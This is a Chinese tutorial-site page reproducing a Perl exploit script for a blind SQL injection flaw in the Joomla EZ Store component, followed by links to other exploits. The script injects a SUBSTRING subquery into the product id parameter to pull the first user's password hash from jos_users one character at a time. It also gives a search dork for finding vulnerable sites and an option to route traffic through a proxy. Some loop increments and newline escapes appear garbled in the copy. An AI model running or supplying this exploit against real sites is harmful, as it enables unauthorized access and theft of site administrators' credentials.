手机
当前位置:查字典教程网 >网络安全 >Exploit >Joomla Component EZ Store Remote Blind SQL Injection Exploit
Joomla Component EZ Store Remote Blind SQL Injection Exploit
摘要:#!/usr/bin/perl#Note:Sometimesyouhavetochangetheregexptoviewcategory/c...

#!/usr/bin/perl

#Note:Sometimes you have to change the regexp to viewcategory/catid,".$cid."

use LWP::UserAgent;

use Getopt::Long; if(!$ARGV[1])

{

print " n";

print " ################################################################n";

print " # Joomla Component EZ Store Blind SQL Injection Exploit #n";

print " # Author:His0k4 [ALGERIAN HaCkeR] #n";

print " # #n";

print " # Conctact: His0k4.hlm[at]gamil.com #n";

print " # Greetz: All friends & muslims HacKeRs #n";

print " # Greetz2: http://www.dz-secure.com #n";

print " # #n";

print " # Dork: inurl:com_ezstore #n";

print " # Usage: perl ezstore.pl host path <options> #n";

print " # Example: perl ezstore.pl www.host.com /joomla/ -p 11 -c 2 #n";

print " # #n";

print " # Options: #n";

print " # -t Valid procuct id #n";

print " # -c Category value of the following product id #n";

print " ################################################################n"; exit;

} my $host = $ARGV[0];

my $path = $ARGV[1];

my $cid = $ARGV[2];

my $pid = $ARGV[3]; my %options = ();

GetOptions(%options, "c=i", "x=s", "p=i"); print "[~] Exploiting...n"; if($options{"c"})

{

$cid = $options{"c"};

} if($options{"p"})

{

$pid = $options{"p"};

} syswrite(STDOUT, "[~] MD5-Hash: ", 14); for(my $i = 1; $i <= 32; $i )

{

my $f = 0;

my $h = 48;

while(!$f && $h <= 57)

{

if(istrue2($host, $path, $cid, $pid, $i, $h))

{

$f = 1;

syswrite(STDOUT, chr($h), 1);

}

$h ;

}

if(!$f)

{

$h = 97;

while(!$f && $h <= 122)

{

if(istrue2($host, $path, $cid, $pid, $i, $h))

{

$f = 1;

syswrite(STDOUT, chr($h), 1);

}

$h ;

}

}

} print "n[~] Exploiting donen"; sub istrue2

{

my $host = shift;

my $path = shift;

my $cid = shift;

my $pid = shift;

my $i = shift;

my $h = shift; my $ua = LWP::UserAgent->new;

my $query = "http://".$host.$path."index.php?option=com_ezstore&Itemid=1&func=detail&id=".$pid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; if($options{"x"})

{

$ua->proxy('http', "http://".$options{"x"});

} my $resp = $ua->get($query);

my $content = $resp->content;

my $regexp = "viewcategory&catid=".$cid.""; if($content =~ /$regexp/)

{

return 1;

}

else

{

return 0;

} }

【Joomla Component EZ Store Remote Blind SQL Injection Exploit】相关文章:

Ultra Office ActiveX Control Remote Buffer Overflow Exploit

LoveCMS 1.6.2 Final Remote Code Execution Exploit

Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit

TGS CMS 0.3.2r2 Remote Code Execution Exploit

Belkin wireless G router ADSL2 modem Auth Bypass Exploit

LoveCMS 1.6.2 Final Update Settings Remote Exploit

Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit

Rianxosencabos CMS 0.9 Remote Add Admin Exploit

fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day

精品推荐
分类导航